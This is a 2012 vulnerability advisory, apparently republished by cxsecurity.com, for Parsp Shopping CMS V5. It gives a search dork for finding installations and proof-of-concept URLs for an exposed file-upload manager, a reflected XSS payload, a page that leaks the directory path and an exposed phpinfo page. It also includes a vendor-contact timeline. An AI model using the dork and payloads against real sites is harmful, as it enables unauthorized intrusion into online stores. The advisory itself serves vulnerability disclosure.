Parsp Shopping CMS V5 Multiple Vulnerability

2012.01.23
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Parsp Shopping CMS [V5] Multiple Vulnerability # Date: 2012-01-22 [GMT +7] # Author: BHG Security Center # Software Link: http://www.parsp.com/ # Vendor Response(s): They didn't respond to the emails. # Dork: intext:"powered by www.parsp.com V5" # Version : [5] # Tested on: ubuntu 11.04 # CVE : - # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) - NoL1m1t (nol1m1t [at] rocketmail [dot] com) ----------------------------------------------------------------------------------------- Parsp Shopping CMS [V4] Multiple Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-01-22 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ------------- ( WYSIWYG Editor ) ~ ~ [PoC]Http://[victim]/path/wysiwyg/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php Allowed formats for uploading ~ $Config['AllowedExtensions']['File'] = array( "zip", "rar", "pdf", "doc", "xls", "csv" ); $Config['AllowedExtensions']['Image'] = array( "jpg", "gif", "jpeg", "png" ); $Config['AllowedExtensions']['Flash'] = array( "swf", "fla" ); $Config['AllowedExtensions']['Media'] = array( "swf", "fla", "jpg", "gif", "jpeg", "png", "avi", "mpg", "mpeg" ); Unauthorized extension $Config['DeniedExtensions']['File'] = array( "html", "htm", "php", "php2", "php3", "php4", "php5", "phtml", "pwml", "inc", "asp", "aspx", "ascx", "jsp", "cfm", "cfc", "pl", "bat", "exe", "com", "dll", "vbs", "js", "reg", "cgi", "htaccess", "asis", "sh", "shtml", "shtm", "phtm" ); ------------- ( Cross Site Scripting ) ~ ~ [PoC] ~: Http://[victim]/path/index.php?advanced_search_in_category=[XSS]&categoryID=13&search=1&search_in_subcategory=1&search_name=&search_price_from=&search_price_to= Note: URL encoded GET input advanced_search_in_category was set to ' onmouseover=prompt(923419) bad=' -------------( Error message on page For Find Directory Address ) ~ ~ [PoC]Http://[victim]/path/printable.php Note:User and account information on the site intended for attacks burteforce -------------( PHPinfo page Information ) ~ ~ [PoC]Http://[victim]/path/phpinfo.php Note:Full information about the Php installed on the server Timeline: ~~~~~~~~~ - 21 - 01 - 2012 bug found. - 21 - 01 - 2012 vendor contacted, but no response. - 22 - 01 - 2012 Advisories release. Important Notes: ~~~~~~~~~ - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in - the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. --------------------------------------------------------------------------- Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | ArYaIeIrAN | NoL1m1t | G3n3Rall Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | Cyber C0der And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ -------------------------------- [ EOF ] ----------------------------------

References:

http://www.parsp.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top